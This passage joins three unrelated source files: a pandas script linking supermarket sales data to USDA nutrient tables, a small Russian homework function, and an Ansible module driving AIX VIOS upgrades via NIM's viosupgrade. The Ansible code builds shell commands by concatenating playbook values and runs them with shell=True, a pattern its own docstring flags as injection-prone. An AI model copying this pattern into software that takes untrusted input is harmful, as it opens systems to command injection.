and ids, such as: carbohydrates or carbohydrates by difference\n\nimport re\nimport os\nimport nltk\nimport time\nimport pickle\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nsys.path.insert(1, './utilities/')\nfrom health_functions import *\n\n# # Import Data\ndef import_data(path1, path2):\n dfList = {}\n for r, d, f in os.walk(path1):\n for file in f:\n if '.csv' in file:\n print(file)\n dfList[file] = pd.read_csv(os.path.join(r, file))\n\n products_df = dfList['product.csv']\n transaction_data_df = dfList['transaction_data.csv']\n\n dfList = {}\n for r, d, f in os.walk(path2):\n for file in f:\n if '.csv' in file:\n # print(file)\n dfList[file] = pd.read_csv(os.path.join(r, file))\n\n # link the nutrient id with its name\n nutrient_df = dfList['nutrient.csv']\n # contains the food articles name and their id test commit\n food_df = dfList['food.csv']\n # contains the nutrients for each food article\n food_nutrients_df = dfList['food_nutrient.csv']\n # linke the food articles ids to their category\n food_category_df = dfList['food_category.csv']\n return products_df,transaction_data_df, nutrient_df, food_df, food_nutrients_df, food_category_df\n\n# ### Most sold items\ndef compute_most_sold_items(products_df,transaction_data_df,selected_categories):\n #select all the items sold at least 1000 times\n sales_qte_df = transaction_data_df[['PRODUCT_ID','QUANTITY']] .groupby(['PRODUCT_ID']).sum().sort_values(by=['QUANTITY'],ascending=False)\n sales_qte_df = sales_qte_df[sales_qte_df['QUANTITY'] > 1000]\n sales_qte_df.head(5)\n\n #select only the categories which are food related and sort them\n products_sales_df = products_df.loc[(products_df['DEPARTMENT'].isin(selected_categories))].join(sales_qte_df, on='PRODUCT_ID', how='inner')\n products_sales_df.sort_values(by='QUANTITY',ascending=False,inplace=True)\n\n #we put all the description in a ingredients column\n products_sales_df['ingredients'] = products_sales_df.COMMODITY_DESC + \" \" + products_sales_df.SUB_COMMODITY_DESC\n products_sales_df.drop([\"DEPARTMENT\",\"BRAND\",\"COMMODITY_DESC\",\"SUB_COMMODITY_DESC\"],axis = 1, inplace = True)\n products_sales_df.ingredients = products_sales_df.ingredients.apply(parse_words)\n\n return products_sales_df\n\ndef clean_dfs(food_nutrients_df,nutrient_df,food_category_df,food_df,list_relevant_nutrients):\n #drop unnecessary columns and rename to be more understandable\n food_nutrients_df.drop([\"data_points\",\"min\",\"max\",\"median\",\"footnote\",\"min_year_acquired\",\"derivation_id\"],axis=1,inplace=True)\n nutrient_df.drop([\"nutrient_nbr\",\"rank\"],axis=1,inplace=True)\n food_category_df.drop([\"code\"],axis=1,inplace=True)\n food_df.drop([\"publication_date\"],axis=1,inplace=True)\n\n food_category_df.rename(columns={'id':'food_category_id','description':'category'},inplace= True)\n #filter out only the necessary food nutrients\n nutrient_df = nutrient_df[nutrient_df.name.isin(list_relevant_nutrients)]\n\n #simplyfy and normalize the nutrient names\n simplified_names = nutrient_df.name.apply(trim_nutrient_name)\n nutrient_df.loc[:,\"name\"] = simplified_names\n # add the names of the nutrients contained in the food\n\n return food_nutrients_df, nutrient_df, food_category_df, food_df\n\n\ndef complete_food_dfs(food_nutrients_df, food_df):\n food_nutrients_df = food_nutrients_df.join(nutrient_df.set_index('id'), on='nutrient_id', how='inner')\n\n #takes a long time to run\n #food_nutrients_df.amount = food_nutrients_df[[\"amount\",\"unit_name\"]].apply(get_amount, axis=1)\n #food_nutrients_df.drop(\"unit_name\",axis=1,inplace=True))\n\n #energy is duplicated because we have both kcal and kj, we take only kcal\n food_nutrients_df = food_nutrients_df.pivot_table(index='fdc_id', columns='name', values='amount',aggfunc='first')\n food_nutrients_df.fillna(value=0, inplace=True)\n\n #add categories to the food df\n food_df = food_df.join(food_category_df.set_index(\"food_category_id\"),on=\"food_category_id\",how=\"left\")\n food_df.drop([\"food_category_id\"],axis=1,inplace=True)\n food_df.description = food_df.description.apply(parse_words)\n\n return food_nutrients_df, food_df\n\nif __name__ == \"__main__\":\n DUNNHUMBY_PATH = '../data/dunnhumby - The Complete Journey CSV/'\n HEALTH_PATH = '../data/health'\n products_df, transaction_data_df, nutrient_df, food_df, food_nutrients_df, food_category_df = import_data(DUNNHUMBY_PATH,HEALTH_PATH)\n\n food_related_categories = np.array(\n ['NUTRITION', 'GROCERY', 'PASTRY', 'MEAT-PCKGD', 'SEAFOOD-PCKGD', 'PRODUCE', 'DELI', 'MEAT', 'SALAD BAR',\n 'GRO BAKERY', 'FROZEN GROCERY', 'SPIRITS', 'RESTAURANT'])\n list_relevant_nutrients = [\"Protein\", \"Total Carbohydrate\", \"Total lipid (fat)\", \"Sucrose\", \"Glucose (dextrose)\",\n \"Sugars, total including NLEA\", \"Fatty acids, total monounsaturated\",\n \"Fatty acids, total polyunsaturated\", \"Fatty acids, total trans\",\n \"Fatty acids, total saturated\", \"Cholesterol\", \"Vitamin E, added\",\n \"Vitamin K (phylloquinone)\", \"Vitamin B-12\", \"Vitamin B-6\", \"Vitamin D\",\n \"Vitamin A, RAE\", \"Sodium, Na\", \"Total fat (NLEA)\", \"Fiber, total dietary\", \"Energy\",\n \"Carbohydrate, by summation\", \"Fructose\"]\n\n products_sales_df = compute_most_sold_items(products_df, transaction_data_df, food_related_categories)\n food_nutrients_df, nutrient_df, food_category_df, food_df = clean_dfs(food_nutrients_df, nutrient_df, food_category_df, food_df, list_relevant_nutrients)\n food_nutrients_df, food_df = complete_food_dfs(food_nutrients_df, food_df)\n\n all_information_df = food_df.join(food_nutrients_df, on='fdc_id', how='inner')\n all_information_df.drop([\"data_type\", \"description\", \"category\"], axis=1, inplace=True)\n\n #Compute word importance for algo\n # all words present in the nutrition dataset\n all_words_nutrition = get_allwords(food_df.description)\n # all words present in the product dataset\n all_words_supermarket = get_allwords(products_sales_df.ingredients)\n\n # #### Inner merge between the 2 sets of words:\n common_words = pd.merge(all_words_supermarket, all_words_nutrition, left_on='name', right_on='name',\n suffixes=('_supermarket', '_nutrition'))\n DIC_SCORE = construct_dic_score(common_words)\n\n #matching the two datasets\n #there is an error in the code, so for now we only using the top 10 items\n temp_df = products_sales_df.head(10).copy()\n find_food1 = lambda list_words: find_food(list_words, food_df, DIC_SCORE)\n temp_df[\"ref_fdc_id\"] = temp_df.ingredients.apply(find_food1).fdc_id\n\n #create our final df with the nutrient information of the supermarket items\n all_df = temp_df.merge(all_information_df, how=\"left\", left_on=\"ref_fdc_id\", right_on=\"fdc_id\")\n all_df.drop([\"MANUFACTURER\", \"ref_fdc_id\", \"fdc_id\"], axis=1, inplace=True)\n all_df.set_index(\"PRODUCT_ID\", inplace=True)\n\n # saves results of this lengthy computation\n all_df.to_pickle(\"../data/results/products_with_link_to_nutrients_df.pickle\")\n\n print(\"done\")\n","sub_path":"src/Health/.ipynb_checkpoints/Health2-checkpoint.py","file_name":"Health2-checkpoint.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615188238","text":"# Реализовать функцию my_func(), которая принимает три позиционных аргумента,\n# и возвращает сумму наибольших двух аргументов.\n\n\ndef my_func(first_number, second_number, third_number):\n \"\"\"\n функция считает сумму наибольших аргументов\n :param first_number: первое число\n :param second_number: второе число\n :param third_number: третье число\n :return: ничего не возвращает и сразу выводит на экран\n # переводим в список чтобы воспользоваться функцией max\n # списох чтобы сохранить наибольшие числа, чтобы потом использовать функцию sum\n # ищем 1ое максимальное число\n # записываем в список для подсчета суммы\n # удаляем из списка аргументов 1е максимально число чтобы найти 2е максимальное\n # добавляем в список для подсчета суммы и потом выводим сумму чисел\n # находим второе максимальное число\n \"\"\"\n my_list = [first_number, second_number, third_number]\n my_sum = []\n max_number = max(my_list)\n my_sum.append(max_number)\n my_list.remove(max_number)\n max_number = max(my_list)\n my_sum.append(max_number)\n print(sum(my_sum))\n\n\nmy_func(-1, -2, 4)\n","sub_path":"HW_3/HW_3.3.py","file_name":"HW_3.3.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48101626","text":"#!/usr/bin/python\n#\n# Copyright 2018, International Business Machines Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n############################################################################\n\"\"\"AIX NIM viosupgrade: tool to upgrade VIOSes in NIM environment\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport threading\nimport logging\nimport time\nimport distutils.util\n\n# Ansible module 'boilerplate'\nfrom ansible.module_utils.basic import AnsibleModule\n\n\nDOCUMENTATION = \"\"\"\n---\nmodule: nim_upgradeios\nauthors: Vianney Robin, Alain Poncet, Pascal Oliva\nshort_description: Perform upgrade operation on a list of targets\nusing viosupgrade (perl) tool\n\"\"\"\n\n\n# -----------------------------------------------------------------------------\ndef exec_cmd(cmd, module, exit_on_error=False, debug_data=True, shell=False):\n\n \"\"\"\n Execute the given command\n\n Note: If executed in thread, fail_json does not exit the parent\n\n args:\n - cmd array of the command parameters\n - module the module variable\n - exit_on_error use fail_json if true and cmd return !0\n - debug_data prints some trace in DEBUG_DATA if set\n - shell execute cmd through the shell if set (vulnerable to shell\n injection when cmd is from user inputs). If cmd is a string\n string, the string specifies the command to execute through\n the shell. If cmd is a list, the first item specifies the\n command, and other items are arguments to the shell itself.\n return\n - ret return code of the command\n - output output and stderr of the command\n - errout command stderr\n \"\"\"\n\n global DEBUG_DATA\n global CHANGED\n global OUTPUT\n\n ret = 0\n output = ''\n errout = ''\n\n th_id = threading.current_thread().ident\n stderr_file = '/tmp/ansible_upgradeios_cmd_stderr_{}'.format(th_id)\n\n logging.debug('command:{}'.format(cmd))\n if debug_data is True:\n DEBUG_DATA.append('exec_cmd:{}'.format(cmd))\n try:\n myfile = open(stderr_file, 'w')\n output = subprocess.check_output(cmd, stderr=myfile, shell=shell)\n myfile.close()\n s = re.search(r'rc=([-\\d]+)$', output)\n if s:\n ret = int(s.group(1))\n output = re.sub(r'rc=[-\\d]+\\n$', '', output) # remove the rc of c_rsh with echo $?\n\n except subprocess.CalledProcessError as exc:\n myfile.close()\n errout = re.sub(r'rc=[-\\d]+\\n$', '', exc.output) # remove the rc of c_rsh with echo $?\n ret = exc.returncode\n\n except OSError as exc:\n myfile.close()\n errout = re.sub(r'rc=[-\\d]+\\n$', '', exc.args[1]) # remove the rc of c_rsh with echo $?\n ret = exc.args[0]\n\n except IOError as exc:\n # generic exception\n myfile.close()\n msg = 'Command: {} Exception: {}'.format(cmd, exc)\n ret = 1\n module.fail_json(changed=CHANGED, msg=msg, output=OUTPUT)\n\n # check for error message\n if os.path.getsize(stderr_file) > 0:\n myfile = open(stderr_file, 'r')\n errout += ''.join(myfile)\n myfile.close()\n os.remove(stderr_file)\n\n if debug_data is True:\n DEBUG_DATA.append('exec_cmd rc:{}, output:{} errout:{}'\n .format(ret, output, errout))\n logging.debug('retrun rc:{}, output:{} errout:{}'\n .format(ret, output, errout))\n\n if ret != 0 and exit_on_error is True:\n msg = 'Command: {} RetCode:{} ... stdout:{} stderr:{}'\\\n .format(cmd, ret, output, errout)\n module.fail_json(changed=CHANGED, msg=msg, output=OUTPUT)\n\n return (ret, output, errout)\n\n\n# ----------------------------------------------------------------\ndef get_ios_mksysb(module):\n\n \"\"\"\n Get all resources of type ios_mksysb and the associated\n spot resources and ioslevel\n defined on the nim master.\n Arguments:\n module: {}\n Return: info_hash = {}\n info_hash[ios_mksysb_name]['spot'] = (String)spot_name\n info_hash[ios_mksysb_name]['ioslevel'] = (String)ioslevel\n \"\"\"\n global CHANGED\n global OUTPUT\n info_hash = {}\n cmd = 'LC_ALL=C lsnim -t ios_mksysb -l'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM ios_mksysb objects: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n # mksysb_name name and associated spot\n ios_mksysb_name = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):\", line)\n if match_key:\n ios_mksysb_name = match_key.group(1)\n info_hash[ios_mksysb_name] = {}\n continue\n\n match_key = re.match(r\"^ioslevel\\s+=\\s+(.*)$\", line)\n if match_key:\n ioslevel = match_key.group(1)\n info_hash[ios_mksysb_name]['ioslevel'] = ioslevel\n continue\n match_key = re.match(r\"^extracted_spot\\s+=\\s+(.*)$\", line)\n if match_key:\n spot = match_key.group(1)\n info_hash[ios_mksysb_name]['spot'] = spot\n continue\n\n logging.debug('ios_mksysb={}'.format(info_hash))\n return info_hash\n\n\n# ----------------------------------------------------------------\ndef get_nim_user_res(module):\n\n \"\"\"\n Get the list of resources of type resolv_conf, script,\n fb_script, file_res, image_data, and log\n defined on the nim master.\n Arguments:\n module: {}\n\n Return: Dictionary of reources key=name valu=type\n type=resolv_conf|script|fb_script|file_res|image_data|and log\n \"\"\"\n global CHANGED\n global OUTPUT\n std_out = ''\n nim_user_res = {}\n\n cmd = 'LC_ALL=C lsnim -t resolv_conf; lsnim -t script; lsnim -t fb_script; '\\\n 'lsnim -t file_res; lsnim -t image_data; lsnim -t log'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM resource: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+\\S+\\s+(\\S+)$\", line)\n if match_key:\n nim_user_res[match_key.group(1)] = match_key.group(2)\n continue\n\n return nim_user_res\n\n\n# ----------------------------------------------------------------\ndef get_nim_clients_info(module):\n \"\"\"\n Get the list of vios defined on the nim master, and get their\n associated cstate and hostname.\n Arguments:\n module: {}\n Return: info_hash = {}\n info_hash[vios_name]['cstate'] = (String) vios cstate\n info_hash[vios_name]['host_name'] = (String) hostname to access vios\n \"\"\"\n global CHANGED\n global OUTPUT\n std_out = ''\n info_hash = {}\n\n cmd = 'LC_ALL=C lsnim -t vios -l'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM vios objects: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n\n vios_name = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):\", line)\n if match_key:\n vios_name = match_key.group(1)\n info_hash[vios_name] = {}\n continue\n\n match_cstate = re.match(r\"^Cstate\\s+=\\s+(.*)$\", line)\n if match_cstate:\n cstate = match_cstate.group(1)\n info_hash[vios_name]['cstate'] = cstate\n continue\n\n # Get VIOS interface info in case we need c_rsh\n match_if = re.match(r\"^if1\\s+=\\s+\\S+\\s+(\\S+)\\s+.*$\", line)\n if match_if:\n info_hash[vios_name]['vios_ip'] = match_if.group(1)\n continue\n\n return info_hash\n\n\n# ----------------------------------------------------------------\ndef get_cluster_status(module, vios):\n\n \"\"\"\n get the status of the vios node in the cluster of vios\n Arguments:\n module: {}\n vios: {}\n Return: integer 0 or 1\n \"\"\"\n\n rc = 1\n if not vios[\"cluster_id\"]:\n return 0\n # get cluster status\n cmd = ['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n 'LC_ALL=C /usr/ios/cli/ioscli cluster -status -fmt :']\n # 'LC_ALL=C /usr/ios/cli/ioscli cluster -status -field '\\\n # 'node_name node_state pool_state node_upgrade_status -verbose\"']\n (ret, std_out, std_err) = exec_cmd(cmd, module)\n # parse std_out\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):(\\S+):(\\S+):(\\S+):(\\d+):(\\S+):(.*)\", line)\n if match_key:\n if match_key.group(6) == \"DOWN\" or match_key.group(7) == \"DOWN\":\n return 1\n else:\n rc = 0\n return rc\n\n\n# ----------------------------------------------------------------\ndef get_viosupgrade_status(module, vios):\n\n \"\"\"\n Run lsnim command to get the vios status during upgrade process\n set vios[\"status\"] = DONE | RUNNING | ERROR\n Arguments:\n module: {}\n vios: {}\n Return: String status = SUCCESS-UPGRADE | RUNNING | FAILURE-UPGRADE\n \"\"\"\n global ERROR\n global RUNNING\n global DONE\n status = RUNNING\n std_out = \"\"\n cmd = 'LC_ALL=C /usr/sbin/lsnim -l {}'.format(vios[\"name\"])\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Viosupgrade error on vios: {} :{}'\\\n .format(vios[\"name\"], std_err)\n logging.error(msg)\n status = ERROR\n vios[\"status\"] = ERROR\n else:\n # parse std_out\n # wait for strings:\n # Cstate = ready for a NIM operation\n # Mstate = currently running\n # Cstate_result = success\n # info = m..e..s..s..a..g..e..\n # err_info = m..e..s..s..a..g..e..\n Mstate = \"\"\n Cstate = \"\"\n Cstate_result = \"\"\n info = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+=\\s+(.*)\", line)\n if match_key:\n if match_key.group(1) == \"Mstate\":\n Mstate = match_key.group(2)\n\n if match_key.group(1) == \"Cstate\":\n Cstate = match_key.group(2)\n\n if match_key.group(1) == \"Cstate_result\":\n Cstate_result = match_key.group(2)\n\n if match_key.group(1) == \"info\":\n info = match_key.group(2)\n continue\n if match_key.group(1) == \"err_info\":\n status = ERROR\n vios[\"status\"] = ERROR\n messages = std_out.split(\"\\n\", 1)\n OUTPUT.append(\"NIM error info {})\".format(messages[0]))\n for line in messages[1].split(\"\\n\"):\n OUTPUT.append(line)\n return status\n\n if not info and Cstate == \"ready for a NIM operation\"\\\n and (Cstate_result == \"success\" or Cstate_result == \"reset\")\\\n and (Mstate == \"currently running\" or Mstate == \"ready for use\"):\n status = DONE\n else:\n status = RUNNING\n vios[\"status\"] = status\n return status\n\n\n# ----------------------------------------------------------------\ndef build_viosupgrade_cmd(vios, validate):\n\n \"\"\"\n Build the viosupgrade command for a specific vios\n with apropriate parameters in a restricted use.\n\n viosupgrade -t bosinst -n hostname -m mksysbname -p spotname\n {-a RootVGCloneDisk: ... | -s} [-c] [-e Resources: ...] [-v]\n\n viosupgrade -t altdisk -n hostname -m mksysb_name -a RootVGCloneDisk\n [-c] [-e Resources: ...] [-v]\n\n Used Flags:\n -t Specifies the type of install. Supported types are: bosinst, altdisk.\n -n Specifies the target VIOS hostname or IP address to perform VIOS upgrade operation.\n -m Specifies the MKSYSB resource name.\n -p Specifies the SPOT resource name.\n -a Specifies the alternate physical volume. if install type is 'bosinst' then\n the disk(s) will be used to take backup of current rootvg.\n For 'altdisk' type installation disk(s) will be used to install the provided image.\n -s Specify to skip cloning of the current rootvg disk(s) to alternate disk(s).\n -c Specify if VIOS is part of the cluster.\n -e Specifies configuration resource(s) to apply as part of the installation.\n supported resources are resolv_conf, script, fb_script, file_res, image_data, log.\n -v Validates the input data for the given VIO Server(s).\n\n Not Used Flags:\n -b Specifies VIOS configuration backup file resource name.\n -r Specifies the new rootvg physical volume to install the provided image.\n -f Specifies file name which contains the list of nodes.\n -q Check the status of triggered upgrade operation.\n\n Arguments:\n vios: {} Dictionary of attributes for the vios object\n validate: boolean\n\n return: string command with flags and parameters\n \"\"\"\n cmd = '/usr/sbin/viosupgrade -t {} -n {} -m {} '\\\n .format(vios[\"action\"], vios[\"name\"], vios[\"ios_mksysb\"])\n if vios[\"action\"] == \"bosinst\":\n cmd = cmd + \" -p \" + vios[\"spot\"]\n if len(vios[\"user_res\"]) != 0:\n cmd = cmd + \" -e \"\n for res in vios[\"user_res\"]:\n cmd = cmd + res + \":\"\n if vios[\"cluster_id\"] != \"\":\n cmd = cmd + \" -c\"\n\n if vios[\"alt_disk\"] != \"\":\n cmd = cmd + \" -a \" + re.sub(' +', ':', vios[\"alt_disk\"])\n elif vios[\"skip\"] is True:\n cmd = cmd + \" -s\"\n if validate:\n cmd = cmd + \" -v\"\n return cmd\n\n\n# ----------------------------------------------------------------\ndef validate_vios(module, vios):\n \"\"\"\n Validate the execution of the viosupgrade command\n Arguments:\n module: {} dictionary\n vios: {} dictionary of attributes of vios object\n Return: integeger 0 --> OK !=0 --> NOK\n \"\"\"\n global ERROR\n global READY\n\n rc = 0\n cmd = build_viosupgrade_cmd(vios, validate=True)\n (rc, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if rc != 0:\n msg = 'Viosupgrade error on vios: {} :{}:{}'\\\n .format(vios[\"name\"], std_out, std_err)\n logging.error(msg)\n vios[\"status\"] = ERROR\n else:\n vios[\"status\"] = READY\n return rc\n\n\n# ----------------------------------------------------------------\ndef validate_tuple(module, tuple, tuple_key, upgrade_status):\n \"\"\"\n validate the execution of viosupgrade command for a list of vios\n beloonging to the same cluster or deserving the same lpar\n and set the result in upgrade_status dict\n\n Arguments:\n module:\n tuple: {} dictionary ov vioses\n tuple_key: String: \"vioses with space separator\"\n upgrade_status: {} key: tuple_key, value:tuple status\n Return: Integer 0 --> OK\n \"\"\"\n rc = 0\n for vios in tuple.values():\n rc = validate_vios(module, vios)\n if rc != 0:\n upgrade_status[tuple_key] = ERROR\n return rc\n upgrade_status[tuple_key] = READY\n return rc\n\n\n# ----------------------------------------------------------------\ndef viosupgrade(module, tuples, upgrade_status):\n \"\"\"\n Execute the viosupgrade command on all vios of all targets selected\n in the tuples dictionary\n In parallel all targets but sequentialy each vios of one target\n set the status of tuples in upgrade_status dict\n Arguments:\n module: {}\n tuples: {}\n upgrade_status: {}\n Return: Integer: number of error\n \"\"\"\n global CHANGED\n global ERROR\n global READY\n global RUNNING\n global DONE\n TIMEOUT = 5400 # 1 H 30 Min\n LOOP_TIME = 90 # 1 Min 30 Sec\n nb_error = 0\n CONTINUE = True\n while CONTINUE: # continue while at least one tuple is not done even not in error\n loop_start = int(time.time())\n CONTINUE = False\n for tuple_key in tuples.keys():\n tuple = tuples[tuple_key]\n if upgrade_status[tuple_key] == ERROR or upgrade_status[tuple_key] == DONE:\n continue # go to next tuple\n elif upgrade_status[tuple_key] == READY:\n validate_tuple(module, tuple, tuple_key, upgrade_status)\n if upgrade_status[tuple_key] == ERROR:\n continue # go to next tuple\n CONTINUE = True\n vioses = tuple_key.split()\n nb_vioses = len(vioses)\n for index, vios_name in enumerate(vioses):\n vios = tuple[vios_name]\n previous_vios = {}\n if index != 0:\n previous_vios = tuple[vioses[index - 1]]\n # if vios is ready ant it is the first or the previous is done\n # then start migration\n if vios[\"status\"] == READY:\n if index == 0 or previous_vios[\"status\"] == DONE:\n # now run the upgrade command.\n cmd = build_viosupgrade_cmd(vios, False)\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Viosupgrade error on vios: {} :{}'\\\n .format(vios_name, std_err)\n logging.error(msg)\n upgrade_status[tuple_key] = ERROR\n vios[\"status\"] = ERROR\n nb_error += 1\n break # break vioses loop and go to next tuple\n upgrade_status[tuple_key] = RUNNING\n vios[\"status\"] = RUNNING\n start_time = int(time.time())\n vios[\"loop_time\"] = start_time\n vios[\"start_time\"] = start_time\n break # break vioses loop and go to next tuple\n\n # if vios is running then test real state\n if vios[\"status\"] == RUNNING:\n actual_time = int(time.time())\n # wait until LOOP_TIME in sec since last test\n if actual_time < vios[\"loop_time\"] + LOOP_TIME:\n # sleep until loop_time + LOOP_TIME in sec\n time.sleep(vios[\"loop_time\"] + LOOP_TIME - loop_start)\n actual_time = vios[\"loop_time\"] + LOOP_TIME\n # test real status an change the status if reqiured then continue\n # Query to get the status of the upgrade for each target\n status = get_viosupgrade_status(module, vios)\n if status == ERROR:\n vios[\"status\"] = ERROR\n upgrade_status[tuple_key] = ERROR\n nb_error += 1\n break\n if status == DONE:\n if get_cluster_status(module, vios) != 0:\n status = RUNNING\n vios[\"loop_time\"] = actual_time\n vios[\"status\"] = status\n # set tuple in error if TimeOut\n if status == RUNNING and (actual_time > vios[\"start_time\"] + TIMEOUT):\n vios[\"status\"] = ERROR\n upgrade_status[tuple_key] = ERROR\n break # break vioses loop and go to next tuple\n\n # if vios is migrated --> next vios\n if vios[\"status\"] == DONE:\n CHANGED = True\n # if last vios is migrated set tuple to migrated --> next tuple\n if index == (len(vioses) - 1):\n upgrade_status[tuple_key] = DONE\n # End of vios loop, go to the next tuple\n # else:\n # continue # loop on the next vios\n return nb_error\n\n\n###################################################################################\n\nif __name__ == '__main__':\n DEBUG_DATA = []\n OUTPUT = []\n NIM_NODE = {}\n CHANGED = False\n VARS = {}\n ERROR = \"UPGRADE-FAILURE\"\n READY = \"READY-FOR-UPGRADE\"\n RUNNING = \"RUNNING\"\n DONE = \"UPGRADE-SUCCESS\"\n REJECTED = \"UPGRADE-REJECTED\"\n nb_error = 0\n\n MODULE = AnsibleModule(\n argument_spec=dict(\n description=dict(required=False, type='str'),\n\n # IBM automation generic attributes\n targets=dict(required=True, type='list'),\n actions=dict(required=True, type='dict'),\n vars=dict(required=False, type='dict'),\n vios_status=dict(required=False, type='dict'),\n nim_node=dict(required=False, type='dict'),\n\n # following attributes are dictionaries with\n # key: 'all_vios' or hostname and value: a string or boolean\n # example:\n # ios_mksysb={\"target1\": \"mksysb_name_1\", \"target2\": \"mksysb_name_2\"}\n # ios_mksysb={\"all_vios\": \"mksysb_name\", \"target2\": \"mksysb_name_2\"}\n ios_mksysb=dict(required=True, type='dict'),\n # force={\"all_vios\": False, \"target_x\": True}\n force=dict(required=False, type='dict'),\n alt_disk=dict(required=False, type='dict'),\n # Resources (-e option) The valid resource type are:\n # resolv_conf, script, fb_script, file_res, image_data, and log\n # Dictionary with key: 'all_vios' or hostname and value: string\n # exemple: user_res={\"all_vios\": \"resolv_conf_name\", \"vios_name\": \"file_res_name\"}\n # in that exemple the viosupgrade will be called with -e resolv_conf_name:file_res_name\n user_res=dict(required=False, type='dict'),\n ),\n )\n\n # =========================================================================\n # Get Module params\n # =========================================================================\n\n msg = \"\"\n user_res = {}\n alt_disk = {}\n VERBOSITY = MODULE._verbosity\n\n targets = MODULE.params['targets']\n actions = MODULE.params['actions']\n ios_mksysb = MODULE.params['ios_mksysb']\n force = MODULE.params['force']\n nim_user_res = []\n REQUIRED_IOSLEVEL = \"2.2.6.30\"\n # Handle playbook variables\n LOGNAME = '/tmp/ansible_upgradeios_debug.log'\n if MODULE.params['vars']:\n VARS = MODULE.params['vars']\n if'log_file' in VARS.keys():\n LOGNAME = VARS['log_file']\n if MODULE.params['vios_status']:\n tuples_status = MODULE.params['vios_status']\n else:\n vios_status = None\n # Open log file\n OUTPUT.append('Log file: {}'.format(LOGNAME))\n LOGFRMT = '[%(asctime)s] %(levelname)s: [%(funcName)s:%(thread)d] %(message)s'\n LEVEL = logging.DEBUG\n \n logging.basicConfig(filename='{}'.format(LOGNAME), format=LOGFRMT, level=LEVEL)\n\n logging.debug('*** START NIM VIOSUPGRADE OPERATION ***')\n all_targets = list(set(targets)) # remove duplicates tuples\n all_targets = [elem.replace(',', ' ').replace(':', ' ') for elem in all_targets]\n all_targets = [re.sub(' +', ' ', elem) for elem in all_targets]\n logging.debug('VIOSUpgrade operation for tagets:{}'.format(targets))\n logging.info('VERBOSITY is set to {}'.format(VERBOSITY))\n OUTPUT.append('VIOSUpgrade operation for {}'.format(all_targets))\n # build mksysb - spot table. spot is needed (if action = bosinst)\n mksysb_htab = get_ios_mksysb(MODULE)\n # build NIM node info (if needed)\n if MODULE.params['nim_node']:\n NIM_NODE = MODULE.params['nim_node']\n else:\n NIM_NODE['nim_vios'] = get_nim_clients_info(MODULE)\n logging.debug('NIM VIOS: {}'.format(NIM_NODE['nim_vios']))\n if MODULE.params['user_res']:\n user_res = MODULE.params['user_res']\n # get all existing user_res from nim server\n # The valid types are: resolv_conf, script, fb_script, file_res, image_data, and log.\n nim_user_res = get_nim_user_res(MODULE)\n if MODULE.params['alt_disk']:\n alt_disk = MODULE.params['alt_disk']\n\n # if health check status is known remove tuple with wrong status\n # build the list of target matching nim client list\n # remove duplicates vios\n # check vios connectivity and get ClusterID\n # get altinst_rootvg disk\n # remove tuples without c_rsh connectivity\n # exclude tuples with different clusterID\n # remove tuple having the same clusterID than an other tuple\n # remove tuple having unsuficient ioslevel\n logging.debug(\"ALL_TARGETS = {}\".format(all_targets))\n new_target_list = []\n all_vioses = []\n all_cluster_ids = []\n\n # build here the targets tuple structure\n tuples = {}\n # tuples = {} # Dict: key = tuple ex: \"vios1 vios2\"\n # tuples[tuple] = {} # Dict: key = vios_name ex: \"vios1\" or \"vios2\"\n # tuples[tuple][vios_name] = {} # Dict: keys are \"name\", \"cluster_id\", \"ios_mksysb\"...\n # tuples[tuple][vios_name][\"name\"] = \"\" # String: \n # tuples[tuple][vios_name][\"host_name\"] = \"\" # String: get from nim object\n # tuples[tuple][vios_name][\"ip\"] = \"\" # String: ip adress coresponding to host_name\n # tuples[tuple][vios_name][\"interface\"] = \"\" # String: interface configured wit ip\n # tuples[tuple][vios_name][\"cluster_id\"] = \"\" # String: \n # tuples[tuple][vios_name][\"altinst_rootvg\"] = \"\" # String: \n # tuples[tuple][vios_name][\"rootvg\"] = \"\" # String: \n # tuples[tuple][vios_name][\"level\"] = \"\" # String: \n # tuples[tuple][vios_name][\"free_pv\"] = {} # Dict: key = disk value = size\n # tuples[tuple][vios_name][\"skip\"] = Boolean: skip the alt disk copy operation\n # tuples[tuple][vios_name][\"action\"] = \"\" # String: \n # tuples[tuple][vios_name][\"ios_mksysb\"] = \"\" # String: \n # tuples[tuple][vios_name][\"spot\"] = \"\" # String: \n # 